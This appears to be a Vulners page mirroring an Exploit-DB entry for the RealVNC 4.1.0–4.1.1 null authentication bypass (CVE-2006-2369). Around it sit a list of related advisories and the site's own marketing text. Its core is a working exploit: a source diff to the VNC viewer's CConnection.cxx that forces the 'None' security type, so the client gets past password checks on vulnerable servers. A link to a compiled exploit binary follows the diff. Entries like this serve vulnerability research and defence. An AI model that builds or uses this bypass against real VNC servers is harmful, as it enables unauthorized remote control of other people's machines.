Lucene search
+L

RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass

🗓️ 16 May 2006 00:00:00Reported by redsandType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 1182 Views

RealVNC 4.1.0 &lt; 4.1.1 VNC Null Authentication Bypas

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
RealVNC Authentication Bypass
26 Aug 201100:00
zdt
githubexploit
GithubExploit
Exploit for Improper Authentication in Vnc Realvnc
8 Mar 202608:00
githubexploit
circl
Circl
CVE-2006-2369
26 Aug 201100:00
circl
checkpoint_advisories
Check Point Advisories
RealVNC Password Authentication Bypass (CVE-2006-2369)
25 May 200600:00
checkpoint_advisories
cve
CVE
CVE-2006-2369
15 May 200616:00
cve
cvelist
Cvelist
CVE-2006-2369
15 May 200616:00
cvelist
debiancve
Debian CVE
CVE-2006-2369
15 May 200616:00
debiancve
exploitdb
Exploit DB
RealVNC - Authentication Bypass (Metasploit)
26 Aug 201100:00
exploitdb
exploitdb
Exploit DB
RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)
15 May 200600:00
exploitdb
exploitdb
Exploit DB
RealVNC 4.1.0/4.1.1 - Authentication Bypass
13 May 201200:00
exploitdb
Rows per page
xx  vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
--- vnc-4_1_1-unixsrc/common/rfb/CConnection.cxx        2005-03-11 09:08:41.000000000 -0600
+++ vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx  2006-05-15 14:03:30.000000000 -0500
@@ -183,7 +183,12 @@

     // Inform the server of our decision
     if (secType != secTypeInvalid) {
-      os->writeU8(secType);
+
+      // [BL4CK] In response to the VNC Null Authentication
+      // force a secType to equal secTypeNone
+      // http://blacksecurity.org
+      secType = secTypeNone;
+      os->writeU8(secTypeNone);
       os->flush();
       vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType);     }

E-DB Note:
Compiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Aug 2017 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
EPSS0.91421
1182